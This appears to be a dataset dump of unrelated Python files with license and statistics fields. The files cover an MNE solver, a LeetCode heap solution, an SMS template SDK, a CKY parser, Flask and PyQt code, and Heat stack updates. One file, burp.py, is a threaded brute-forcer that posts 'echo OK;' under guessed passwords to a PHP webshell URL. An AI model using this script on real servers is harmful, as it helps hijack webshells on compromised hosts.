Parameters
----------
M : array, shape (n_channels, n_times)
The whitened data.
G : array, shape (n_channels, n_dipoles)
The gain matrix a.k.a. the forward operator. The number of locations
is n_dipoles / n_orient. n_orient will be 1 for a fixed orientation
constraint or 3 when using a free orientation model.
n_orient : int
Can be 1 or 3 depending if one works with fixed or free orientations.
If n_orient is 3, then ``G[:, 2::3]`` corresponds to the dipoles that
are normal to the cortex.
Returns
-------
X : array, (n_active_dipoles, n_times)
The time series of the dipoles in the active set.
active_set : array (n_dipoles)
Array of bool. Entry j is True if dipole j is in the active set.
We have ``X_full[active_set] == X`` where X_full is the full X matrix
such that ``M = G X_full``.
"""
K = linalg.solve(np.dot(G, G.T) + 1e15 * np.eye(G.shape[0]), G).T
K /= np.linalg.norm(K, axis=1)[:, None]
X = np.dot(K, M)
indices = np.argsort(np.sum(X ** 2, axis=1))[-10:]
active_set = np.zeros(G.shape[1], dtype=bool)
for idx in indices:
idx -= idx % n_orient
active_set[idx:idx + n_orient] = True
X = X[active_set]
return X, active_set
###############################################################################
# Apply your custom solver
# loose, depth = 0.2, 0.8 # corresponds to loose orientation
loose, depth = 1., 0. # corresponds to free orientation
stc = apply_solver(solver, evoked, forward, noise_cov, loose, depth)
###############################################################################
# View in 2D and 3D ("glass" brain like 3D plot)
plot_sparse_source_estimates(forward['src'], stc, bgcolor=(1, 1, 1),
opacity=0.1)
|
bsd-3-clause
| -3,530,687,313,560,286,000 | 37.505556 | 79 | 0.633386 | false |
jiadaizhao/LeetCode
|
0401-0500/0407-Trapping Rain Water II/0407-Trapping Rain Water II.py
|
1
|
1241
|
from typing import List
import heapq
class Solution:
def trapRainWater(self, heightMap: List[List[int]]) -> int:
m = len(heightMap)
if m == 0:
return 0
n = len(heightMap[0])
if n == 0:
return 0
visited = [[False]*n for _ in range(m)]
pq = []
for i in range(m):
heapq.heappush(pq, (heightMap[i][0], i, 0))
visited[i][0] = True
if n > 1:
heapq.heappush(pq, (heightMap[i][n - 1], i, n - 1))
visited[i][n - 1] = True
for j in range(1, n - 1):
heapq.heappush(pq, (heightMap[0][j], 0, j))
visited[0][j] = True
if m > 1:
heapq.heappush(pq, (heightMap[m - 1][j], m - 1, j))
visited[m - 1][j] = True
vol = 0
while pq:
h, row, col = heapq.heappop(pq)
for nr, nc in (row-1, col), (row+1, col), (row, col-1), (row, col+1):
if 0 <= nr < m and 0 <= nc < n and (not visited[nr][nc]):
heapq.heappush(pq, (max(h, heightMap[nr][nc]), nr, nc))
visited[nr][nc] = True
vol += max(h - heightMap[nr][nc], 0)
return vol
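# --- Illustrative usage sketch (not part of the original solution file) ---
# A hedged example exercising the solution on the height map from the problem
# statement of LeetCode 407; the trapped volume for this grid is expected to be 4.
if __name__ == '__main__':
    height_map = [[1, 4, 3, 1, 3, 2],
                  [3, 2, 1, 3, 2, 4],
                  [2, 3, 3, 2, 3, 1]]
    print(Solution().trapRainWater(height_map))  # expected: 4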
|
mit
| -7,279,575,406,421,195,000 | 36.606061 | 81 | 0.423852 | false |
yunpian/yunpian-python-sdk
|
yunpian_python_sdk/api/tpl.py
|
1
|
6941
|
# -*- coding: utf-8 -*-
'''
Created on Jun 19, 2017
@author: dzh
'''
from ..model.constant import (YP_TPL_HOST, APIKEY, VERSION_V2, VERSION_V1, TEMPLATE, TPL_CONTENT, TPL_ID)
from .ypapi import YunpianApi, CommonResultHandler
class TplApi(YunpianApi):
    '''Template API: https://www.yunpian.com/api2.0/tpl.html'''
def _init(self, clnt):
super(TplApi, self)._init(clnt)
self.host(clnt.conf(YP_TPL_HOST, 'https://sms.yunpian.com'))
def get_default(self, param=None, must=[APIKEY]):
        '''Fetch the default template(s).
        Param name / Type / Required / Description / Example
        apikey String yes Unique account API key 9b11127a9701975c734b8aee81ee3526
        tpl_id Long no Template id, a 64-bit long. If given, the matching default template is returned; otherwise all default templates are returned. 1
Args:
param:
Results:
Result
'''
param = {} if param is None else param
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V1:rsp[TEMPLATE] if TEMPLATE in rsp else None, VERSION_V2:rsp}[self.version()])
return self.path('get_default.json').post(param, h, r)
def get(self, param=None, must=[APIKEY]):
        '''Fetch template(s).
        Param name / Type / Required / Description / Example
        apikey String yes Unique account API key 9b11127a9701975c734b8aee81ee3526
        tpl_id Long no Template id, a 64-bit long. If given, the matching template is returned; otherwise all templates are returned. 1
Args:
param:
Results:
Result
'''
param = {} if param is None else param
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V1:rsp[TEMPLATE] if TEMPLATE in rsp else None, VERSION_V2:rsp}[self.version()])
return self.path('get.json').post(param, h, r)
def add(self, param, must=[APIKEY, TPL_CONTENT]):
        '''Add a template.
        Param name / Type / Required / Description / Example
        apikey String yes Unique account API key 9b11127a9701975c734b8aee81ee3526
        tpl_content String yes Template content; it must start with a signature wrapped in 【】 【云片网】您的验证码是#code#
        notify_type Integer no How the review result is reported by SMS: 0 always notify (default); 1 notify only when rejected; 2 notify only when approved;
        3 never notify 1
        lang String no Required for international SMS templates; template language: Simplified Chinese zh_cn; English en; Traditional Chinese zh_tw; Korean ko; Japanese ja
        zh_cn
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V1:rsp.get(TEMPLATE), VERSION_V2:rsp}[self.version()])
return self.path('add.json').post(param, h, r)
def del_tpl(self, param, must=[APIKEY, TPL_ID]):
        '''Delete a template.
        Param name / Type / Required / Description / Example
        apikey String yes Unique account API key 9b11127a9701975c734b8aee81ee3526
        tpl_id Long yes Template id, a 64-bit long 9527
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V2:rsp}[self.version()])
return self.path('del.json').post(param, h, r)
def update(self, param, must=[APIKEY, TPL_ID, TPL_CONTENT]):
        '''Update a template.
        Param name / Type / Required / Description / Example
        apikey String yes Unique account API key 9b11127a9701975c734b8aee81ee3526
        tpl_id Long yes Template id, a 64-bit long, identifying the template to update 9527
        tpl_content String yes
        Template content; it must start with a signature wrapped in 【】 【云片网】您的验证码是#code#
        notify_type Integer no How the review result is reported by SMS: 0 always notify (default); 1 notify only when rejected; 2 notify only when approved;
        3 never notify 1
        lang String no Required for international SMS templates; template language: Simplified Chinese zh_cn; English en; Traditional Chinese zh_tw; Korean ko; Japanese ja
        zh_cn
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V1:rsp.get(TEMPLATE),
VERSION_V2:rsp[TEMPLATE] if TEMPLATE in rsp else rsp}[self.version()])
return self.path('update.json').post(param, h, r)
def add_voice_notify(self, param, must=[APIKEY, TPL_CONTENT]):
        '''Add a voice-notification template.
        HTTP method: POST
        Parameters:
        Param name / Type / Required / Description / Example
        apikey String yes Unique account API key 9b11127a9701975c734b8aee81ee3526
        tpl_content String yes Template content, without a signature 您的验证码是#code#
        notify_type Integer no How the review result is reported by SMS: 0 always notify (default); 1 notify only when rejected; 2 notify only when approved; 3 never notify 1
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V2:rsp}[self.version()])
return self.path('add_voice_notify.json').post(param, h, r)
def update_voice_notify(self, param, must=[APIKEY, TPL_ID, TPL_CONTENT]):
        '''Update a voice-notification template.
        Note: after a successful update the template must pass review again before it can be used. If you change any variables, re-test the template to avoid substitution errors.
        Parameters:
        Param name / Type / Required / Description / Example
        apikey String yes Unique account API key 9b11127a9701975c734b8aee81ee3526
        tpl_id Long yes Template id, a 64-bit long, identifying the template to update 9527
        tpl_content String yes Template content 您的验证码是#code#
Args:
param:
Results:
Result
'''
r = self.verify_param(param, must)
if not r.is_succ():
return r
h = CommonResultHandler(lambda rsp: {VERSION_V2:rsp}[self.version()])
return self.path('update_voice_notify.json').post(param, h, r)
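# --- Illustrative usage sketch (not part of the original module) ---
# A hedged example of reaching TplApi through the SDK client. The import path,
# the client constructor and the 'YOUR_APIKEY' placeholder are assumptions based
# on the rest of this SDK; check the package documentation for the exact entry point.
if __name__ == '__main__':
    from yunpian_python_sdk.ypclient import YunpianClient
    client = YunpianClient('YOUR_APIKEY')  # hypothetical API key
    result = client.tpl().get({})  # fetch all templates for this account
    print(result.code(), result.msg())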
|
mit
| -3,225,037,988,573,082,600 | 32.748466 | 132 | 0.577168 | false |
wilkeraziz/notebooks
|
MoL_June15/parser.py
|
1
|
3853
|
from cfg import read_grammar_rules, WCFG
from rule import Rule
from symbol import is_terminal, is_nonterminal, make_symbol
from collections import defaultdict
from item import Item
from agenda import Agenda
def cky_axioms(cfg, sentence):
"""
Axioms for CKY.
Inference rule:
-------------------- (X -> alpha) in cfg and 0 <= i < n
[X -> * alpha, [i]]
:param cfg: a context-free grammar (an instance of WCFG)
:param sentence: the input sentence (as a list or tuple)
:returns: a list of items
"""
items = []
for rule in cfg:
for i in range(len(sentence)): # from zero to n-1
items.append(Item(rule, [i]))
return items
def scan(item, sentence):
"""
Scan a terminal (compatible with CKY and Earley).
Inference rule:
[X -> alpha * x beta, [i ... j]]
------------------------------------ sentence[j] == x
[X -> alpha x * beta, [i ... j + 1]]
:param item: an active Item
:param sentence: a list/tuple of terminals
:returns: an Item or None
"""
assert is_terminal(item.next), 'Only terminal symbols can be scanned, got %s' % item.next
if item.dot < len(sentence) and sentence[item.dot] == item.next:
return item.advance(item.dot + 1)
else:
return None
def complete(item, agenda):
"""
Move dot over nonterminals (compatible with CKY and Earley).
Inference rule:
[X -> alpha * Y beta, [i ... k]] [Y -> gamma *, [k ... j]]
----------------------------------------------------------
[X -> alpha Y * beta, [i ... j]]
:param item: an active Item.
if `item` is complete, we advance the dot of incomplete passive items to `item.dot`
otherwise, we check whether we know a set of positions J = {j1, j2, ..., jN} such that we can
advance this item's dot to.
:param agenda: an instance of Agenda
:returns: a list of items
"""
items = []
if item.is_complete():
# advance the dot for incomplete items waiting for item.lhs spanning from item.start
for incomplete in agenda.waiting(item.lhs, item.start):
items.append(incomplete.advance(item.dot))
else:
# look for completions of item.next spanning from item.dot
ends = set()
for complete in agenda.complete(item.next, item.dot):
ends.add(complete.dot)
# advance the dot of the input item for each position that complete a span
for end in ends:
items.append(item.advance(end))
return items
def make_forest(complete_items):
"""
Turn complete items into a WCFG.
:param complete_items: complete items (iterable)
:returns: a WCFG
"""
forest = WCFG()
for item in complete_items:
lhs = make_symbol(item.lhs, item.start, item.dot)
rhs = []
for i, sym in enumerate(item.rule.rhs):
rhs.append(make_symbol(sym, item.state(i), item.state(i + 1)))
forest.add(Rule(lhs, rhs, item.rule.prob))
return forest
def make_chart(complete_items, n):
chart = [[defaultdict(list) for j in range(n)] for i in range(n)] # n by n matrix with edges
for item in complete_items:
chart[item.start][item.dot][item.lhs].append((item.rule, item.dots_))
return chart
def cky(cfg, sentence):
A = Agenda()
for item in cky_axioms(cfg, sentence):
A.push(item)
while A:
item = A.pop()
if item.is_complete() or is_nonterminal(item.next):
for new in complete(item, A):
A.push(new)
else:
new = scan(item, sentence)
if new is not None:
A.push(new)
A.make_passive(item)
return make_forest(A.itercomplete())
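# --- Illustrative usage sketch (not part of the original module) ---
# A hedged example of running the CKY deduction system above on a toy sentence.
# The grammar format accepted by read_grammar_rules() is an assumption (a
# "LHS ||| RHS ||| prob" style is used here), so treat this as a shape-of-usage
# sketch rather than a specification.
if __name__ == '__main__':
    grammar_lines = [
        '[S] ||| [NP] [VP] ||| 1.0',
        '[NP] ||| dogs ||| 1.0',
        '[VP] ||| bark ||| 1.0',
    ]
    toy_cfg = WCFG(read_grammar_rules(grammar_lines))
    forest = cky(toy_cfg, 'dogs bark'.split())
    print(forest)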
|
apache-2.0
| 5,860,028,394,567,559,000 | 32.224138 | 101 | 0.568129 | false |
jkpr/pma-api
|
pma_api/__init__.py
|
1
|
1033
|
"""Definition of application object."""
from flask import Blueprint, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from config import config
db = SQLAlchemy()
# pylint: disable=wrong-import-position
from .app import PmaApiFlask
from .response import QuerySetApiResult
root = Blueprint('root', __name__)
@root.route('/version')
def show_version():
"""Show API version data."""
return jsonify(QuerySetApiResult.metadata())
def create_app(config_name):
"""Create configured Flask application.
Args:
config_name (str): Name of the configuration to be used.
Returns:
Flask: Configured Flask application.
"""
app = PmaApiFlask(__name__)
app.config.from_object(config[config_name])
CORS(app)
db.init_app(app)
app.register_blueprint(root)
from .api_1_0 import api as api_1_0_blueprint
app.register_blueprint(api_1_0_blueprint, url_prefix='/v1')
app.add_url_rule('/', view_func=lambda: 'To be implemented.')
return app
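# --- Illustrative usage sketch (not part of the original module) ---
# A hedged example of creating and serving the application; the configuration
# name 'default' is an assumption about the keys exposed by config.config.
if __name__ == '__main__':
    application = create_app('default')
    application.run(debug=True)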
|
mit
| -3,959,312,989,697,954,000 | 20.978723 | 65 | 0.692159 | false |
az0/tweets2sql
|
test_tweets2sql.py
|
1
|
1976
|
#!/usr/bin/env python
# vim: ts=4:sw=4:expandtab
## tweets2sql
## Copyright (C) 2013 Andrew Ziem
## https://github.com/az0/tweets2sql
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test tweets2sql using pytest <http://pytest.org/>
"""
from tweets2sql import *
import os
import pytest
@pytest.fixture()
def connection(tmpdir):
tmpfile = tmpdir.join('archive.sqlite')
connect_sql("sqlite:///%s" % tmpfile)
def test_TimelineTweet(connection):
"""Test TimelineTweet with mock data"""
tl = Timeline(screen_name='test_user')
# insert mock data
tdate = twitterdate("Wed Aug 29 17:12:58 +0000 2012")
text = u'\ucef4\ud328'
tid = 240859602684612608
tlt = TimelineTweet(id=tid, user_id=161651238,
user_screen_name='test',
text=text, created_at=tdate,
source='Twitter', timeline=tl)
assert(tlt.id == tid)
# retrieve it
tlt2 = TimelineTweet.get(tid)
# compare
assert(text == tlt.text)
def test_TimelineArchiver(connection):
"""Test TimelineArchiver with Twitter connection"""
twitter_search = connect_twitter()
ta = TimelineArchiver('bleachbit', twitter_search)
archive_loop(ta)
results = Timeline.selectBy(screen_name = 'bleachbit')
assert(results.count() == 1)
results = TimelineTweet.selectBy(user_screen_name = 'bleachbit')
assert(results.count() > 0)
|
gpl-3.0
| 6,015,416,128,891,507,000 | 28.492537 | 72 | 0.695344 | false |
apdjustino/DRCOG_Urbansim
|
src/opus_gui/results_manager/views/ui_results_browser.py
|
1
|
12710
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/ckla/Documents/workspace/opus_trunk/opus_gui/results_manager/views/results_browser.ui'
#
# Created: Sun May 10 17:20:29 2009
# by: PyQt4 UI code generator 4.4.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_ResultsBrowser(object):
def setupUi(self, ResultsBrowser):
ResultsBrowser.setObjectName("ResultsBrowser")
ResultsBrowser.resize(819, 744)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(ResultsBrowser.sizePolicy().hasHeightForWidth())
ResultsBrowser.setSizePolicy(sizePolicy)
self.gridLayout_4 = QtGui.QGridLayout(ResultsBrowser)
self.gridLayout_4.setObjectName("gridLayout_4")
self.splitter_2 = QtGui.QSplitter(ResultsBrowser)
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
self.splitter_2.setObjectName("splitter_2")
self.groupBox_3 = QtGui.QGroupBox(self.splitter_2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_3.sizePolicy().hasHeightForWidth())
self.groupBox_3.setSizePolicy(sizePolicy)
self.groupBox_3.setAutoFillBackground(False)
self.groupBox_3.setFlat(False)
self.groupBox_3.setObjectName("groupBox_3")
self.verticalLayout = QtGui.QVBoxLayout(self.groupBox_3)
self.verticalLayout.setObjectName("verticalLayout")
self.configSplitter = QtGui.QSplitter(self.groupBox_3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.configSplitter.sizePolicy().hasHeightForWidth())
self.configSplitter.setSizePolicy(sizePolicy)
self.configSplitter.setOrientation(QtCore.Qt.Horizontal)
self.configSplitter.setHandleWidth(12)
self.configSplitter.setObjectName("configSplitter")
self.groupBox = QtGui.QGroupBox(self.configSplitter)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(2)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox.sizePolicy().hasHeightForWidth())
self.groupBox.setSizePolicy(sizePolicy)
self.groupBox.setBaseSize(QtCore.QSize(0, 100))
self.groupBox.setFlat(True)
self.groupBox.setObjectName("groupBox")
self.verticalLayout_4 = QtGui.QVBoxLayout(self.groupBox)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setMargin(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.lst_available_runs = QtGui.QListWidget(self.groupBox)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(4)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lst_available_runs.sizePolicy().hasHeightForWidth())
self.lst_available_runs.setSizePolicy(sizePolicy)
self.lst_available_runs.setMinimumSize(QtCore.QSize(0, 0))
self.lst_available_runs.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.lst_available_runs.setBaseSize(QtCore.QSize(100, 50))
self.lst_available_runs.setAlternatingRowColors(True)
self.lst_available_runs.setObjectName("lst_available_runs")
self.verticalLayout_4.addWidget(self.lst_available_runs)
self.groupBox_2 = QtGui.QGroupBox(self.configSplitter)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.groupBox_2.setBaseSize(QtCore.QSize(20, 0))
self.groupBox_2.setFlat(True)
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout_3 = QtGui.QVBoxLayout(self.groupBox_2)
self.verticalLayout_3.setSpacing(0)
self.verticalLayout_3.setMargin(0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.lst_years = QtGui.QListWidget(self.groupBox_2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lst_years.sizePolicy().hasHeightForWidth())
self.lst_years.setSizePolicy(sizePolicy)
self.lst_years.setMinimumSize(QtCore.QSize(0, 0))
self.lst_years.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.lst_years.setBaseSize(QtCore.QSize(20, 50))
self.lst_years.setAlternatingRowColors(True)
self.lst_years.setObjectName("lst_years")
self.verticalLayout_3.addWidget(self.lst_years)
self.groupBox_4 = QtGui.QGroupBox(self.configSplitter)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(5)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_4.sizePolicy().hasHeightForWidth())
self.groupBox_4.setSizePolicy(sizePolicy)
self.groupBox_4.setBaseSize(QtCore.QSize(500, 0))
self.groupBox_4.setFlat(True)
self.groupBox_4.setObjectName("groupBox_4")
self.verticalLayout_2 = QtGui.QVBoxLayout(self.groupBox_4)
self.verticalLayout_2.setSpacing(0)
self.verticalLayout_2.setMargin(0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.indicator_table = QtGui.QTableWidget(self.groupBox_4)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(7)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.indicator_table.sizePolicy().hasHeightForWidth())
self.indicator_table.setSizePolicy(sizePolicy)
self.indicator_table.setMinimumSize(QtCore.QSize(0, 0))
self.indicator_table.setBaseSize(QtCore.QSize(500, 50))
self.indicator_table.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.indicator_table.setDragDropOverwriteMode(False)
self.indicator_table.setAlternatingRowColors(True)
self.indicator_table.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
self.indicator_table.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.indicator_table.setTextElideMode(QtCore.Qt.ElideNone)
self.indicator_table.setShowGrid(True)
self.indicator_table.setColumnCount(3)
self.indicator_table.setObjectName("indicator_table")
self.indicator_table.setColumnCount(3)
self.indicator_table.setRowCount(0)
self.verticalLayout_2.addWidget(self.indicator_table)
self.verticalLayout.addWidget(self.configSplitter)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QtGui.QSpacerItem(40, 2, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.cb_auto_gen = QtGui.QCheckBox(self.groupBox_3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cb_auto_gen.sizePolicy().hasHeightForWidth())
self.cb_auto_gen.setSizePolicy(sizePolicy)
self.cb_auto_gen.setTristate(False)
self.cb_auto_gen.setObjectName("cb_auto_gen")
self.horizontalLayout.addWidget(self.cb_auto_gen)
self.verticalLayout.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.lbl_current_selection = QtGui.QLabel(self.groupBox_3)
font = QtGui.QFont()
font.setWeight(75)
font.setBold(True)
self.lbl_current_selection.setFont(font)
self.lbl_current_selection.setObjectName("lbl_current_selection")
self.horizontalLayout_2.addWidget(self.lbl_current_selection)
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.verticalLayout_5 = QtGui.QVBoxLayout()
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.pb_generate_results = QtGui.QPushButton(self.groupBox_3)
self.pb_urbancanvas = QtGui.QPushButton(self.groupBox_3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pb_generate_results.sizePolicy().hasHeightForWidth())
self.pb_generate_results.setSizePolicy(sizePolicy)
self.pb_generate_results.setMinimumSize(QtCore.QSize(0, 0))
self.pb_generate_results.setObjectName("pb_generate_results")
self.verticalLayout_5.addWidget(self.pb_generate_results)
sizePolicy.setHeightForWidth(self.pb_urbancanvas.sizePolicy().hasHeightForWidth())
self.pb_urbancanvas.setSizePolicy(sizePolicy)
self.pb_urbancanvas.setMinimumSize(QtCore.QSize(0, 0))
self.pb_urbancanvas.setObjectName("pb_urbancanvas")
self.verticalLayout_5.addWidget(self.pb_urbancanvas)
self.horizontalLayout_2.addLayout(self.verticalLayout_5)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.tabwidget_visualizations = QtGui.QTabWidget(self.splitter_2)
self.tabwidget_visualizations.setMinimumSize(QtCore.QSize(0, 200))
self.tabwidget_visualizations.setObjectName("tabwidget_visualizations")
self.starttab = QtGui.QWidget()
self.starttab.setObjectName("starttab")
self.tabwidget_visualizations.addTab(self.starttab, "")
self.gridLayout_4.addWidget(self.splitter_2, 0, 0, 1, 1)
self.retranslateUi(ResultsBrowser)
self.tabwidget_visualizations.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(ResultsBrowser)
def retranslateUi(self, ResultsBrowser):
ResultsBrowser.setWindowTitle(QtGui.QApplication.translate("ResultsBrowser", "Result Browser", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox_3.setTitle(QtGui.QApplication.translate("ResultsBrowser", "Configure an indicator to view", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox.setTitle(QtGui.QApplication.translate("ResultsBrowser", "Simulation Runs", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox_2.setTitle(QtGui.QApplication.translate("ResultsBrowser", "Years", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox_4.setTitle(QtGui.QApplication.translate("ResultsBrowser", "Indicators", None, QtGui.QApplication.UnicodeUTF8))
self.indicator_table.setSortingEnabled(False)
self.cb_auto_gen.setToolTip(QtGui.QApplication.translate("ResultsBrowser", "Automatically generate and view the indicator when it\'s selected", None, QtGui.QApplication.UnicodeUTF8))
self.cb_auto_gen.setText(QtGui.QApplication.translate("ResultsBrowser", "Automatically generate", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_current_selection.setText(QtGui.QApplication.translate("ResultsBrowser", "current selection", None, QtGui.QApplication.UnicodeUTF8))
self.pb_generate_results.setText(QtGui.QApplication.translate("ResultsBrowser", "Generate results", None, QtGui.QApplication.UnicodeUTF8))
self.pb_urbancanvas.setText(QtGui.QApplication.translate("ResultsBrowser", "View in UrbanCanvas", None, QtGui.QApplication.UnicodeUTF8))
self.tabwidget_visualizations.setTabText(self.tabwidget_visualizations.indexOf(self.starttab), QtGui.QApplication.translate("ResultsBrowser", "starttab", None, QtGui.QApplication.UnicodeUTF8))
################################3
self.cb_auto_gen.setText(QtGui.QApplication.translate("ResultsBrowser", "Uncertainty options generate", None, QtGui.QApplication.UnicodeUTF8))
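# --- Illustrative usage sketch (not part of the generated module) ---
# pyuic-generated classes are attached to a plain widget at runtime. A hedged,
# minimal example of showing this form with the PyQt4 API imported above:
if __name__ == "__main__":
    import sys
    app = QtGui.QApplication(sys.argv)
    dialog = QtGui.QDialog()
    ui = Ui_ResultsBrowser()
    ui.setupUi(dialog)
    dialog.show()
    sys.exit(app.exec_())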
|
agpl-3.0
| -1,741,197,974,735,579,600 | 61.925743 | 200 | 0.735877 | false |
CaiJiJi/Test
|
burp.py
|
1
|
1749
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import urllib2
import urllib
import sys
import argparse
import threading
#headers = {"Content-Type":"application/x-www-form-urlencoded",
# "Connection":"Keep-Alive",
# "Referer":"http://www.baidu.com/"};
def BurpShell(host, password):
global headers
url = host
    data = urllib.urlencode({password: "echo OK;"})  # build the POST payload
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
result = the_page.find('OK')
#print result
    if result != -1:  # the response contains "OK"
print '----- find password:', password
sys.exit()
return
def usage():
print """Example:
%s --burp=http://www.baidu.com/shell.php
""" % (sys.argv[0])
exit()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
else:
parser = argparse.ArgumentParser(description='Fuck PhpWebshell Password')
parser.add_argument('--burp', action='store', dest="host")
given_args = parser.parse_args()
host = given_args.host
        tsk = []  # create the pool of worker threads
with open(r'pass.txt', 'r') as fPass:
for password in fPass.readlines():
password = password.strip()
#print 'xxxxxxx %s >> %s >> %s' % (host, shell, password)
t= threading.Thread(target = BurpShell, args=(host, password))
                t.daemon = True  # run as a daemon thread; change if needed
tsk.append(t) # t.start()
fPass.seek(0)
for t in tsk:
t.start()
            t.join(1)  # wait at most 1s so the loop is not blocked
print "All thread OK,maybe not "
sys.exit()
|
gpl-2.0
| -3,973,588,263,690,421,000 | 29.527273 | 81 | 0.54735 | false |
openstack/heat
|
heat/engine/update.py
|
1
|
12695
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from heat.common import exception
from heat.engine import dependencies
from heat.engine import resource
from heat.engine import scheduler
from heat.engine import stk_defn
from heat.objects import resource as resource_objects
LOG = logging.getLogger(__name__)
class StackUpdate(object):
"""A Task to perform the update of an existing stack to a new template."""
def __init__(self, existing_stack, new_stack, previous_stack,
rollback=False):
"""Initialise with the existing stack and the new stack."""
self.existing_stack = existing_stack
self.new_stack = new_stack
self.previous_stack = previous_stack
self.rollback = rollback
self.existing_snippets = dict((n, r.frozen_definition())
for n, r in self.existing_stack.items()
if n in self.new_stack)
def __repr__(self):
if self.rollback:
